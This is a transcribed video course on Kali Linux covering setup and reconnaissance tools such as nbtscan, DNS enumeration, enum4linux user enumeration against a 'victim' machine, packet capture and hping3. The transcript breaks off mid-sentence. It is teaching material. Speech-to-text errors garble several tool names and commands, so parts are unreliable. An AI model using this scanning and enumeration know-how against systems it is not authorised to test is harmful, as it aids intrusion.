Welcome to Introduction of Complete Hacking Tool in Kali Linux course. Kali Linux is security focused Linux distribution based on Debian. It's a rebranded version of the famous Linux distribution known as Backtrack, which came with huge repositories of open source hacking tools for networks, wireless and web application penetration testing. You learn all hacking tools from information gathering, vulnerability analysis, wireless attacks, web application, Metasploit, exploitation tools, forensic tools, stress testing, sniffing and spoofing, password attacks, maintaining access, reverse engineering, social engineering, reporting tools, and many more. For what you're waiting for, enroll now. Disclaimer: this course is meant for education purpose only. Neither Udemy nor instructor is responsible for implementation of any hack learned in this course. This course is made with the vision to jumpstart career in ethical hacking. We have demonstrated hacking various things in this course with respective countermeasure. Methods demonstrated in this course are still effective. Organizations are helpless, so white hat hacker are only hope for cybersecurity. Welcome. In this video we will see settings. I have made this video because I got a lot of reviews saying that the volume of the course is pretty much low, and some are saying that the instructor is going too fast, and some are saying the instructor is going too slow. Just like YouTube, Udemy also has some settings where you can play the video the way you like. For example, this video, if you have volume problem, you can increase the volume or you can bring it down depending upon your headphone and speakers. And next, speed. So here the normal speed is 1x, that is normal. If you want to go slow, you can go for 0.75x. Now video is going slow. If you felt 1x is too slow, then you can speed it up in this way. So in this way, you can play the video the way you want at the speed you understand my videos. After speed and volume, the next thing many people do right is quality of the video. For the quality, you can go to settings and you can opt here whichever quality you want. It is in auto, it is taking 480p. If you want the best quality, you can go for 720p. My original videos are 1080, but the highest quality Udemy offers is 720p. And next thing is, here autoplay is turned on automatically. Many students get problem while replaying some videos. So if you want to replay some videos, just turn the autoplay off. After completion of a video, the next video will not begin, so that you can easily replay the present video. So in this way, you can watch all the videos with the speed and volume you want. So that's it in this video on basic setting you have to set right before starting the course. Thank you for watching this video. Welcome. In this video we will see how to make Kali Linux operating system bootable. Kali Linux has two options in the default boot menu which enable persistence, the preservation of data on Kali Live USB drive, and second, across reboot of Kali Live. This can be an extremely useful enhancement and enables you to retain documents, collected testing results, configuration, etc. Persistence means that all data changes that take place while you are using the system, they'll be saved on the USB or pen drive that which you have made bootable. To make use of USB persistence option at boot time, you will need to do some additional setup on your Kali Linux Live USB drive, and in this video we will cover that. First of all, reason for using live USB drive with persistence. You can preserve data on Kali Live USB. You can install some addition packages. You can take no space of your hard drive for it. You can take your OS to any PC you use. You use all of your system resources, example CPU, RAM, GPU, etc. Now let's begin. Let's open a browser and search Kali Linux download in Google. You will see that Kali.org official website download link. Click on it. Now download the latest Kali image file. I will click on Kali Linux 64-bit OS. You can go for 32-bit if you have 32-bit operating system. It's downloading. I will just fast forward this process. Downloading is complete. You can see the image file of Kali Linux operating system. Now I want Power ISO tool. I will go and search for Power ISO tool to make it bootable. So I will type Power ISO. Click on Power ISO official website. Here I am downloading 32-bit Power ISO version. After downloading, install it. I have already installed, so I will just open it up. In administrator mode, you see that Power ISO main window. Click on Tools tab, select Create Bootable USB Drive, select image file which we have downloaded, the image file of Kali Linux operating system. Plug your USB drive. You should have minimum 8 GB. Sometime I did it on 4 GB pen drive, but sometime it may work, but it's better to go for 8 GB one. Refresh it. You can see that my pen drive is listed here, that is SanDisk USB. And finally click on start button to create bootable USB. It will take few minutes, so here I am forwarding the video. You can see that writing USB drive completed successfully. So this is what you have to do to make a bootable Kali Linux operating system. Let me restart my system. On your PC boot, it will give you few of the options, that is live AMD 64, live AMD 64, fail-safe, live forensic mode, live USB persistence, live USB encrypted persistence, and install. I will go for live mode. You can see that it is running and the Kali Linux system loaded up. So this is how you make Kali Linux bootable in a pen drive. So that's all. Thank you for watching this video. Welcome. In this video we'll learn about Kali Linux VMware setup. Installing Kali Linux is not much harder as it was for Backtrack operating system back then. Anyhow, for students, I have made this video where student will learn how to install Kali Linux in VMware mode, which is pretty much easy to use. First, let us see why I do recommend students virtual machine mode itself only instead of other options. It gives you a safe environment to play and explore without damaging your files, like the files of your Windows operating system or Mac operating system, and will not lose any kind of data in particular. Before we begin, you should have basic knowledge of virtual machine and basic knowledge of little bit of networking. If you don't know, it's fine, and some basic knowledge of Linux or Unix operating system. If you have no idea, then also it's fine. You will learn and explore with it, but you will feel a little bit of difficulties. What is required? You have to download the VMware version of Kali Linux operating system. We will see in this video, and you should have virtual machine installed. That also we will see in this video. Let's begin. First, open a browser and search for VMware version of Kali Linux. Just type Kali Linux VMware. Go to the link of Kali Linux official website. You'll get the download links. Just download whichever suits you. My computer is 64-bit, so I will go for 64-bit link. After downloading, just extract it and keep it as it is. We'll come back to it later on. Now search for VMware, download the VMware and install it. I will just skip this installation as it is pretty much simple. Now back to the extracted folder. You can see that virtual machine configuration file. Double click on Kali Linux 2018 VM. EMD64 virtual machine configuration file, you can see that Linux started up in VMware. So this is how you set up Linux operating system in VMware, which I do recommend to my student all the time. That's all. Thank you for watching this video. So welcome. In this video we will see Linux 2019. In my courses I have used Linux 2018, 17 and so on. Many of my students asked for Linux 2019. What here I want to show is there is no such difference between the previous Linux version and the present one. The main difference between the previous and present Linux version is the tools. They have added few more tools in Linux in present version, and they have removed some of the tools which were present in old version. Like here you can see there are a lot of tools in different sections. Here in CMS and framework identification you can see clustered WP scan. In web application proxies there is Burp Suite. In web crawler and directories there is derb duster, wfuzz, and in web vulnerability scanner there is Burp Suite, comics, Nmap, Necto and so on. So these are the tools you will see in these courses. So the demonstration of all these tools you will see in this course. And here in offline attack, hashcat, hash identifier, OPH crack, online attacks, in that Hydra is used to do brute force on login, John the Ripper and so on. Passing the hash tools, there are various tools. The word list, they have got different kind of word list. Crunch, hashcat, John the Ripper. In word list you will get different kind of password word list and username word list. In fuzzing tools, there are different fuzzing tools to send TCP, VoIP tools. You got Necto and Nmap. And in wireless tool, what we popularly know is Reaver, but they have included few more tools, that is Bully, Phone Wi-Fi Cracker, and Bluetooth. You can see here is Reaver. There are various tools. I'll try my best to make new videos on these new tools. And here there is Metasploit framework and social engineering toolkit. There are a lot of tools in social engineering toolkit. SQL map to do SQL injections. Here we got AtterCap, Mac Changer, Wireshark, OS backdoor tool, web backdoor tools, which will be handy while doing web exploitation. And we got forensic tools. We got Maltego, Faraday. So these are a number of tools are present in Linux. With every new version they keep on adding and removing tools, but the basic Linux version remains the same. If you want any software or a tool which is not present in the present version of Linux, you can go to GitHub and search for it and get it installed. You will see in the course also how to get tools you want from GitHub and how to install it in Linux. You will get to know further in the course how to get the tool you want from GitHub and install it on Linux. So that's it. A brief introduction of Linux 2019. This video I did on demand of students. Thank you for watching this video. Welcome. In this video we are going to learn setting up Metasploitable machine. Metasploitable is an intentionally vulnerable Linux virtual machine. This virtual machine can be used to conduct security training, test security tools, and practice common penetration testing techniques. Let's open a browser and search Metasploitable to download. Click on sourceforge.net link. You can select any link like Rapid, GitHub and so on. I'll go for sourceforge.net. Let's download Metasploitable to zip file. Here you can see that it is downloaded. Extract the zip file. Open up extracted folder and run Metasploit table VMware virtual machine file. Here you can see that Metasploit table 2 is loaded in virtual machine. Type username as msfadmin and password as msfadmin. Let's see Metasploit table 2 IP address. Its IP address is 192.168.154.246. By changing from NAT to bridge, opens the VMware and network up to potential attacks. To maintain a safe network, you could skip this process of NAT to bridge and only use the host only network. So that's it in this video on setting up Metasploit table vulnerable machine. Thank you for watching this video. Welcome. In this video we will see basic Linux command. In this video we'll do all kind of activity on Linux operating system. In this case Kali Linux, that is Kali Linux, best known operating system for pen testing. It is important to understand basic Linux command to avoid any kind of trauma of not getting anything in later on part of course. You can skip this video if you know basic Linux command pretty well. So let's begin. The Kali Linux operating system used either in a terminal mode where you type command or in a Windows Explorer style graphical user interface, as we do in Windows or Mac. So let's begin. First I'll go to start and open VirtualBox, select Kali Linux and hit on start, switch, OK, continue. Kali Linux loads up in VirtualBox. I will just fast forward. Kali Linux loaded up. Now click on other to choose different account. Write username as root and password for root is Tor, T-O-O-R, and hit on login. As you can see here, Kali Linux has graphical user interface mode. As you can see here, Kali Linux has graphical user interface. You can see computer icon as you can see in Windows and Mac. I'll open computer by double click. You can see here it has two drives, one is for CD and DVD and other for file system. In file system you can see all the important files related to Kali Linux. Now I'll open up root. I have saved some folders in root. Creating a folder, creating a text file, deleting a file, everything is same. If you right click on folder, you can see same option. You can see same option which you notice in Windows and Mac, that is copy, move to trash, that is delete, send to properties and so on. So the graphical user interface is similar to Mac and Windows. But the Kali Linux operating system is well known for pen testing, so all kind of pen testing activity we have to do it in terminal. In this video we will just see basic Linux command. The first command we will see is man. This command brings up the online Unix manual. Use it on each command. Like for example, I'll write man pwd. You will see the manual for pwd command. pwd shows what directory you are in. To come back, I will quit, that is, I will press Q. Now I will write pwd to no present working directory. Root is my present working directory, that is home in user interface. To list all the files in root, I will write ls. As you can see here, the ls command has listed all the directories in root, that is Amit, Cracking, Desktop, DWA, and so on. In user interface, to change directory, I have to just double click on directory and the directory will be changed. But in terminal, I have to write cd, that is change directory, and directory name, that is cd dvwa. To list the file inside dvwa, I will write ls. Now I will write cd, that is change directory, space double dot, and press enter. This command moves up one directory. Now I will go to DVA directory inside DVA directory. To do same in terminal, I have to write cd, that is change directory, space dvwa/dvwa. Now to move back to the root directory, I will write cd space diddly. Now we are back to the root directory. Now let me delete the directory so that I show you how to create directory. In graphical user interface, I'll just right click on it and hit on move to trash. Now to create directory in graphical user interface, I have to just right click and hit on create new folder, whereas in terminal I have to write mkdir, that is make directory space Amit, that is directory name, and the directory is created. To remove directory, rmdir, that is remove directory space directory name. The directory is removed. ls to list the files in directory. Now I will again create the directory. Directory is here. Let me create a text document here. I'll just rename it as AB. To remove AB, I have to just type rm space AB, that is remove AB. Let me create this text document again to demonstrate copy and move commands. To copy, I'll write cp space AB space Amit. From this command, AB will be copied to Amit directory. Now I will delete this AB from Amit to move AB to Amit. For that I will write mv ab space Amit /. You can see here AB is not here in root directory, it is in Amit directory. Now to unzip this dvwa.zip file, I will write unzip space dvwa. As you can see here, dvwa.zip file got unzipped. There are many Linux commands which I can't teach all, which you have to use according to circumstances. So for that you have to know how to find the particular command using Google search engine. For example, creating a text document in Linux. If you have no idea how to create text document in Linux, just search for create txt in Linux. You will get many search results. Pick any one of the link and know how to create text document in Linux. That's how you have to find Linux command according to your necessity. That's all in Linux basic command. Thank you for watching this video.
Welcome. In this video we are going to learn whois information gathering tool in Linux. A whois Linux command is a utility as a part of the information gathering used in all of the Linux-based operating system. This tool is a part of information security assessment and one of the information gathering techniques. There are a lot of information gathering strategies. It is used to identify domain information and more. Unknown and distant hosts, networks, even net admins if you use the command the right way and you are lucky enough. Whois a database managed by a local internet registrar available to us. The personal information about the owner, for example his contact details, his organization name, and his IP as well as his geographical location. We can use whois command to retrieve that information. Let's see it in practical. Let's open up terminal and type whois space -h. Here you can see the basic usage, whois options, -h host connect to server host, -p port connect to the port, and so on. So let's check for google.com. I will type whois space. Here you can see that information is much more substantial. Here we got addresses, phone numbers, organization handles, and everything. For the Google site, we got server name registrar. As you can notice that the information is certainly less substantial, but fun and relevant if you are just starting. So in this way, you can check for any web address or a domain to get the information. So that's it in this video on whois information gathering tool. Thank you for watching this video. Welcome. In this video we are going to learn npt-stat, which is information gathering tool in Linux. Introduction. npt-scan is a quick tool which gives instant results relating to which hosts are alive on your network and replying to NetBIOS queries. Let's open up npt-scan tool
application information gathering, SMB analysis, NBT scan, or open terminal and type NBT scan. NBT scan version 1.5.1. Here you can see that the basic syntax for NBT scan tool, NBT scan -v -d -e -l -t timeout -b bandwidth -r -q -s separator -m retransmits -f file name scan range. Let's see the basic options for NBT scan. -v verbose output, print all the names received from each host. -d dump packets, print whole packet contents. -e format in etc host format. -l format output in lm host format cannot be used with -v, -s or -h options. -t timeout, wait timeout millisecond for response, default 1000, and so on. Here you can see that some basic example, NBT scan -r 192.168.1.0 24 scans the whole C class network. Here I created one IP_address.txt file that wrote some random IP addresses. Type NBT scan -f root desktop IP_address.txt. Here you can see that matches IP address, netbuyer's name, user and MAC address. Let this scan a live host information on same network IP range. Type NBT scan 192.168.0.0 24. Here you can see that matches IP address, netbuyer's name, user and MAC addresses. Type NBT scan -v 192.168.0.7. Here you can see that verbose output for 192.168.0.7 host. Adapter address of 192.168.0.7 host is 001E A6ED03. So that's it in this video on NBT stat information gathering tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn fping information gathering tool Linux. Fping is a ping-like program which uses ICMP protocol to determine if a host is up. Fping is different from ping in that you can specify any number of hosts on the command line or specify a file containing the list of hosts to ping. Instead of trying one host until it timeouts or replies, fping will send out a ping packet and move on the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within certain time limit or retry limit, it will be considered unreachable. Let's open up terminal and type fping -h. Here you can see that basic usage fping options target -a show the targets that alive, -A show the target by the address, -b an amount of ping data to send in bytes, -bf set exponentially backoff factor of f, and so on. Now let's find target domain is alive or not. Type fping -a google.com. Here you can see that we get response as google.com. This means google.com is alive. Type fping -a amithuddar1478.com. Here you can see that amithuddar1478.com name or server is not known. Fping to also check domain IP address is alive or not. Type fping -a 173.194.36.14. You can see that 173.147 IP address is alive. Let's find the target by address using -a option. Type fping -a google.com. You can see that IP address of Google is 172.217.26.206 is alive. Let's show elapsed time on return packets using -e option. Type fping -e google.com.
Google.com is alive and it took 86.9 milliseconds. So that's it in this video. Thank you for watching this video. Welcome. In this video we are going to learn TCP traceroute information gathering tool. What's TCP traceroute? TCP traceroute is a traceroute implementation using TCP packets. The more traditional traceroute sends out either UDP or ICMP echo packets with a TTL of 1 and increments the TTL until the destination has been reached. By printing the gateways that generate ICMP time exceeded messages along the way, it is able to determine the path packets are taking to reach the destination. The problem is that with the widespread use of firewalls on the modern internet, many of the packets that traceroute sends out end up being filtered, making it impossible to completely trace the path to the destination. However, in many cases, these firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections on. By sending out TCP SYN packets instead of UDP or ICMP echo packets, TCP traceroute is able to bypass the most common firewall filters. It is worth noting that TCP traceroute never completely establishes a TCP connection with the destination host. If the host is listening for incoming connection, it will respond with an RST indicating that the port is closed. The host instead responds with SYN or ACK, the port is known to be open, and an RST sent by kernel traceroute is running on to tear down the connection without completing three-way handshake. This is the same half-opening scanning technique that Nmap uses when passed the -SS flag. How TCP traceroute works? It uses TCP SYN package and set TTL as 1 as initial packet to send to network. Each hop will decrease TTL by 1, so each hop will generate a time exceeded ICMP packet back to the sender. Those ICMP packet includes the original packet information. For the next hop, the sender will use TTL2 until the destination, which will also send back TCP SYN or ACK reply to the sender. -n displays numeric output rather than doing reverse DNS lookup for each hop. By default, reverse lookups are never attempted on RFC 1918 address space, regardless of the -n flag. -N perform reverse DNS lookup for each hop, including RFC 1918 address. -f set initial TTL used in the first outgoing packet. The default is 1. -m set maximum TTL used in outgoing packets. The default is 30. -p use the specified local TCP port in outgoing packets. Default is to obtain a free port from the kernel using bind. Unlike with traditional traceroute, this number will not increase with each hop, and so on. Let's open up terminal, type TCP traceroute. Here you can see that basic syntax TCP traceroute -hv, -hvn fcae, -i dev, -f furst, -tt1, -l length. Clear the screen. To trace the path to web server listening for connections on port 80, type TCP traceroute space hacking2.com. You can see that traceroute to hacking2.com 30 hops max, 60 byte packets by default on the port 80. Let's use traceroute to know network path. Type traceroute space google.com -p443 -f2. Here you can see that trace the path to Google server listening for connection on port 443. Set initial TTL used in the two outgoing packet. Detect transparent proxy in between. Type TCP traceroute google.com -f2. Compare above port 80 output with port 443. We know there is transparent proxy in between. It stops before reaching redhat.com. So that's it in this video on TCP traceroute information gathering tool in Linux. Thank you for watching this video. Welcome, in this video we are going to learn information gathering live host identification tool Linux. So let's begin. Open the terminal in Linux and type where is xprobe2. xprobe2 is in user bin xprobe2 etc xprobe2 user share man in1 xprobe2.1.gz. It's in the user local bin, so if that directory is in our path variable, we can use xprobe2 from any directory. Now let's get some basic help to run xprobe2 for OS fingerprinting. Next type xprobe2. Here you can see the usage, xprobe2 options, target and options. Now let's try fingerprinting an unknown system, and next type xprobe2 google.com. xprobe2 tells us with the 100% probability that the system is foundry networks ironware. This is the gigabyte switch on the google.com domain, and next type xprobe2 space -l. By default, xprobe2 uses all of its modules, but we can remove modules by using the -d switch. For instance, on many networks, the ICMP module will hang and you may need to remove these modules to get xprobe2 to work. The next type xprobe2 space -d 11 google.com. xprobe2 tells us with 100% probability that the system is foundry networks ironware. And next type xprobe2 space hackingtutor.com, which is my own website. xprobe2 tells us that it has determined with 83% probability hackingtutor.com has. So that's it in this video on information gathering live host identification tool. That's all. Thank you for watching this video. Welcome, in this video we are going to learn SSLYZE information gathering tool in Linux. SSLYZE is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive and should help organizations and testers identify misconfiguration affecting their SSL servers. Key features include multiprocessed and multi-threaded scanning, SSL 2.0 or 3.0 and TLS 1.0, 1.1, 1.2 compatibility, performance testing, session resumption and TLS ticket support, security testing, weak cipher suits, insecure renegotiation, crime, heartbleed and more. Server certificate validation and revocation checking through OCSP stapling. Support for STAR-TLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP and FTP. Support for client certificates when scanning servers that perform mutual authentication. XML output to further process the scan result. Let's open up terminal and type SSLYZE, fast and full-featured SSL scanner. Let's see the basic syntax or usage of SSLYZE tool. SSLYZE options, target1.com, target2.com, 443, etc. Here we must understand all the options. This option will help to gather the information from target URL. Options -- version show program's version number and exit, -h help shows this help message and exit, -xml underscore out equals to xml underscore file writes the scan result as an XML document to the file xml underscore file, --targets underscore n equals to targets underscore n reads the list of targets to scan from the file targets underscore n. It should contain one host port per line.
timeout equals to timeout sets the timeout value in seconds used for every socket connection made to the target server. The default is 5 seconds. Let's launch a regular scan type against the target host. So type sslyzd-regular www.google.com. Here you can see that the scan result for google.com session renegotiation, client initiated, renegotiation is rejected, secure renegotiation is supported. Here you can see that certification contains SHA1 fingerprint, F1DFA77P37 and so on. You can see that common name, issuer, serial number and so on. Here you can see that all certificates are trusted. You can scan the website using port address also. Type sslyzd-regular www.google.com 443. Here you can see that the scan is started on Google 443 port. So that's all in this video on sslyzd information gathering tool in Linux. Thank you for watching this video. Welcome. In this video we are going to see how to capture packets by using TCP dump. So let's start. First I will open terminal and type TCP dump space -h. Here you can see the options of TCP dump. Now let's start to capture the packets. For that I will type TCP dump space -i eth0, that is interface, -w root/desktop/amit.pcap. If you don't know what is eth0 and all, please do watch this course from the beginning. Here I am capturing traffic of my interface, that is eth0, and saving the captured file on desktop. Here you can see the packet capturing is started. Now I am going to visit any website to capture more packets. So now I am going to stop this. I'll press Ctrl+C. Here you can see there are total 1723 packets are captured. So now I will close the terminal. Here you can see on desktop captured file. Now let's open this. Right click on the file and select open with Wireshark. Here you can see Wireshark tool is opened. Here you can see the packets. So let's go to filter box and type HTTP. Here you can see HTTP packets are separated. You can even observe the website name which I had browsed. So that's how one can capture traffic by using TCP dump. So that's it in this video. Thank you for watching this video. Welcome. In this video we are going to see basic introduction of T-Shark. T-Shark is command line tool of Wireshark, or you can say Wireshark command line interface. So let's begin. In terminal I'll just type T-Shark space -h. You can see the options of T-Shark. Now clear the terminal and type T-Shark space -D. Now you can see the list of the interface. Now to select the interface, type T-Shark space -i eth0. Here you can see the packet capturing is started. Now stop this and type T-Shark space -D. Now you can also select interface based on this number. Here you can see I'm using number of the interface to capture the traffic T-Shark -D. Now next, if you want to capture traffic from two or more interface, So now type tshark space -i 8880 space -i any. Here we are capturing traffic onto interface. Here you can see we are capturing traffic from to interface. So that's it in this video on introduction of tshark, which is command line interface of Wireshark. Thank you for watching this video. Welcome. In this video we are going to see how to install Wireshark tool. As you know that information travel through the network in packets form, by using the Wireshark tool we will analyze the network traffic. So let's see first how to install the Wireshark tool. If you know it, you can skip it. First I will open Google and type Wireshark. Now I will go to the official Wireshark website. Here you can see download option. I will click on it. Now I will select download according to the bits of my PC, as mine is 64-bit. Here I am downloading 64-bit. If you right click on my computer and go to properties, you will get how much bit is your system. Nowadays all computers are 64-bit. Here you can see downloading started, download complete. To install, I will double click on it. I'll just click next. Here I'm creating shortcut of Wireshark on desktop. Now I'll click simple next. Here you can see installation is completed. I'll click on finish. Now to run the Wireshark, go to Wireshark Legacy and double click on it. I want to warn here that most of the students go to just Wireshark option and then ask, it's showing different one. If you want complete feature of Wireshark, go to Wireshark Legacy. Here you can see it's open now. Now I'll select interface. This interface will appear if your system is connected to other system. Like I have virtual machines, and in my office I have around 6 to 7 computers. So those all computers are connected to Wi-Fi, so it creates a local network. So if you want the options here, make sure you have some network. Here I'm selecting one. I'll click here to start. You can see Wireshark started to capture all the packets which travel in our network. So that's it in this video. You have to remember that you need to have a network and your system should be part of the network to get started with Wireshark. Thank you for watching this video. Welcome. In this video we are going to learn what are the basic things in Wireshark tool. That is Wireshark overview. So let's start. Here you can see I have opened Wireshark tool. In Wireshark tool you have many operations. You should know some basic things about the Wireshark. Here you can see the interface list, and you can also see the interface list by clicking on interface list. Here you can see the list of the interface. Now go to edit and select preferences. Now here small window appeared. So let's see what are the things are in it. Now I'll select layout. Here you can see how to display pans in different ways. As you can see, the current layout is first one. Select layout according to you. As you see below, you can see what you see in the first pan, second pan and the third pan. Here are selected packet list in the first, the packet detail in the second pan, and the packet bytes in the third pan. Next, you can see what are the things to be displayed on the columns. And next, you can select the text size, and you have many variations to display the text. And you can also have the color option. Now next, go to capture. Here you can see select your by default interface. After you set this, then no need to set the interface while you are starting Wireshark. Next, you can also add your filter expressions. After that, you go name resolution. Here you can resolve MAC address and IP address. Then if you go to protocols, you can see the protocol list. So that's it in this video on Wireshark overview. We'll see more in this course, so no need to worry if I covered very little on overview in this video. Thank you for watching this video. Welcome. In this video we are going to learn subdomain brute forcer, that is subroot, which is information gathering tool in Linux. Subroot is one of the most popular and accurate subdomain enumeration tools. It's a community-driven project and it uses OpenResolver as a proxy, so subroot doesn't send traffic to the domain's name servers. It's not an online tool and you need to install this on your computer. You can use on Windows or Unix based OS and installation is very easy. And this demonstration is based on CentOS or Linux. Here I am writing wget downloading commands. Let's open up terminal and download latest subroot tool. Paste wget downloading command as wget http github.com the rook subroot achieve master.zip. Here you can see that downloading is started. Master.zip file is saved in root directory. Type ls. Here you can see that file name in red color, master.zip. Let's unzip the master.zip file. Type unzip space master.zip. Here you can see that file is unzipped. Type cd. Unzipped folder is subroot-master. Terminal directory is changed. Type ls. Here you can see that all the files and folders in subroot master directory. Let's run subroot.py python file. Type python space subroot.py. Here you can see that the basic usage of subroot tool. Subroot.py options target underscore domain subroot.py space -p target underscore domain. Let's scan domains for hackingtool.com. Here you can see that subdomain for hackingtool.com. Let's stop it. So type Ctrl+C. Now scan Google subdomains. Here you can see that subdomains for google.com. So that's it in this video on subdomain brute forcer, that is subroot, which is information gathering tool in Linux. Thank you for watching this video.
Welcome. In this video we are going to learn DNS enum information gathering tool. DNS enum is a tool for DNS enumeration, which is the process of locating all DNS servers and DNS entries for an organization. DNS enumeration will allow us to gather critical information about the organization, such as usernames, computer names, IP addresses, and so on. Basically, it's an Perl script and it performs the following operations. Gets the host address, gets the name servers, gets the MX records, perform queries on name servers, gets bind version, gets extra names and subdomains via Google scraping, brute force subdomains from the file, calculates C-class domain network ranges and performs whois queries on them, performs reverse lookups on net ranges, writes to text file IP blocks. Let's see in practical. Let's open up Linux and open up DNS-enum. Here you can see that basic usage DNS-enum space -enum URL and options -DNS server uses DNS server for ANS and MX queries. All the option you can see here: help, no reverse, enum, and so on. Google scraping option, that is -p, pages, the number of Google search pages to process when scraping names. The default is 5 pages. The -sh must be specified. Brute force options, -f, -file, read subdomain from this file to perform brute force. Whois net range options, -d, that is -delay, maximum value of seconds to wait between whois queries. The value is defined randomly. The default is 3 seconds, and so on. So we can see by just giving a simple command, we have name servers, mail server, host address, and many more. The result vary from website to website, and scope enhances when there are subdomains in the target website. We can also use DNS-enum to scrap the subdomains of a website from Google. Let's gather DNS information from google.com with verbose mode output. Here you can see that wildcard test is good. Google server information NS1, NS2, NS3, NS4. You can see mail servers, IP address, and server names. So that's it in this video on DNS-enum information gathering tool. Thank you for watching this video. Welcome. In this video we are going to learn DNSRecon information gathering tool called Linux. DNSRecon is a tool for enumeration coded in Python. It enables to gather DNS-oriented information on a given target. DNSRecon provides the ability to perform check all NS record for zone transfers, enumerate general DNS record for a given domain, perform common SRV record enumeration, top-level domain expansion, check for wildcard resolution, brute for subdomain, host A and for A records given in a domain and a word list. Perform a PTR record lookup for a given IP range or CIDR. Check a DNS server cache record for A and C name records, provided a list of host records in a text file to check. Enumerate common MDNS records in the local network, enumerate host and subdomain using Google. Let's open up terminal and type DNSRecon space -h. Here you can see that basic syntax DNSRecon.py, DNSRecon tool, options, that is -h, help to show help message, -d to domain target domain, -r, range IP range for reverse lookup, brute force in formats, and so on. -xml for XML file to save records. Now we have to scan a domain, use a dictionary to brute force hostname. For that, type DNSRecon space -d hackingdude.com, that is to scan this domain, and use a dictionary to brute force hostname. For that, let's specify the path of dictionary, that is -d user share word list dnsmap.txt space -d std space -xml dnsrecon.xml. Here you can see that performing general enumeration of domain, here 0 record is saved in dnsrecon.xml file. Let's try the same command on google.com. Standard record enumeration. As a result, we can get SOA record, name server, mail host, IP ranges that the company is using, and what server can send emails. Here you can see that 31 enumerating SRV records are found here and saved in dnsrecon.xml file. So that's it in this video on DNS Recon information gathering tool. Thank you for watching this video. Welcome, in this video you will see DNS Tracer information gathering tool called Linux. DNS Tracer determines where a given domain server gets its information from and follows a chain of DNS servers back to the servers knows the data. The tool works by sending a specified name server a non-recursive request for the name. If the name server thus returns an authoritative answer for the name, the next server is queried. If it returns a non-authoritative answer for the name servers in the authority records will be queried. The program stops if all the name servers are queried. This tool objective is to map the target till you reach the root name servers. Let's see how it works. It sends the specified name server a non-recursive request for the name. Non-recursive means if the server knows it, it will return the data requested. If the name server doesn't know it, it will return the pointers to name server that are authoritative for the domain part in the name, or it will return the addresses of the root name servers. If the name server thus returns an authoritative answer for the name, the next server is queried. If it returns a non-authoritative answer for the name servers in authority records will be queried. The program stops if all the name servers are queried. Make sure the server you are querying doesn't do forwarding towards other servers, as DNS Tracer is not able to detect this for you. It detects so-called lame servers, which are name servers which has been told to have information about the criteria domain but don't have this information. Let's see something in practical. Let's open up terminal, DNS Tracer, that is trace DNS queries to the source. Type DNS tracers. You can see that the basic syntax DNS tracer options host. DNS tracer tool options are -c disable local caching default enabled, -c enable negative caching default enabled, -o enable overview of received answers, and so on. Let's scan a domain and retry up to 3 times and display verbose output. Type DNS tracer -r3 -v hacking2.com. This command is used to see in verbose mode. You can see that tracing to hacking2.com via 192.168.154 maximum of 3 tries. You can see that it sends specified name server a non-recursive request and it will return DNS server information for hacking2.com. The same thing I tried for google.com, that is you can see while trying on the domain google.com, it sends specified name server a non-recursive request and it will return DNS server information for google.com. So that's it in this video on DNS Tracer information gathering tool. Thank you for watching this video. Welcome, in this video we are going to see Nmap for Linux information gathering tool, a Linux alternative to nmap.exe for enumerating data from Windows and Samba host. Nmap for Linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to nmap.exe, formerly available from www.bindview.com. It is written in Perl and basically a wrapper around Samba tools SMB client, RP client, NAT, and NMB lookup. We'll go through tool usages with example, and previous version of the tool can be taken in a view. Key features: array recycling. User listing when restrict anonymous is set to 0 on Windows 2000. Listing of group membership information. Share enumeration. Detecting if a host is in a workgroup or a domain. Identifying the remote operating system. Password policy retrieval. Now let's do some practical. Let's open up terminal and type enum eax -h.
IX protocol username enumerator. Here you can see that basic syntax, that is enum EAX, options IP, enum tool options, U get user list, M get machine list, -S get share list, -P get password policy information, and so on. You can see that additional options are -A do all enumeration. This option is enabled if you don't provide any other option. -H display the help message, and so on. Let's open the victim machine as my Windows 7. Here you can see that IP address is 192.168.0.6. Attempt to get user list and OS information from target. Type enum for Linux -u -o 192.168.0.16. Here you can see that the target information, target 192.168 so and so, RID range 500 to 550, 1000 to 1050, usernames, administrator, guest, KRBTGT, domain, etc. Here you can see we got OS info 192.168 so and so from SMP client, domain white PC, OS Windows 7 Ultimate 6.1. Let's see that the basic information of victim machine both are same. So that's it in this video on enum for Linux information gathering tool. Thank you for watching this video. Welcome, in this video we are going to learn hping 3 information gathering tool called Linux. Hping is a command line oriented TCP or IP packet assembler or analyzer. The interface is inspired to ping Unix command, but hping isn't only able to send ICMP echo request, it supports TCP, UDP, ICMP and raw IP protocols. Has a traceroute mode, the ability to send files between a covered channel and many other features. While hping was mainly used as a security tool in the past, it can be used in many ways by the people that don't care about security to test networks and host. A subset of the stuff you can do using hping: firewall testing, advanced port scanning, network testing using different protocols, TOS, fragmentation, manual path, MTU discovery, advanced traceroute under all supported protocols, remote OS fingerprinting, remote uptime guessing, TCP or IP stacks auditing. hping can also be useful to the students that are learning TCP or IP. Let's do some practical. So first open up terminal, active network smashing tool. So type hping 3 space -h. Here you can see that basic syntax hping 3 host options. Options are -h show this help, -v show version, -c packet count, and so on. Mode options as -o raw IP, -i ICMP, IP option -a, spoof, spoof source address, -rand, test random destination address node. Common options are -d data, data size, -e file data from file, and so on. Let's ping duplicate package to google.com. You can use any host. Use traceroute mode, be verbose in ICMP mode against the target. So let's do it. hping 3 traceroute mode, so -- traceroute, be verbose, so -v in ICMP mode, so -1, and the target. You see that the packets are being sent to target. So that's it in this video in hping 3 information gathering tool. Thank you for watching this video. Welcome, in this video we are going to learn Automator. It's an information gathering tool in Linux. Automator is a URL, IP address, and MD5 hash OSINT tool aimed at making the analysis process easier for intrusion analysts. Given a target or a file full of targets, Automator will return relevant results from sources like the following: ipvoid.com,
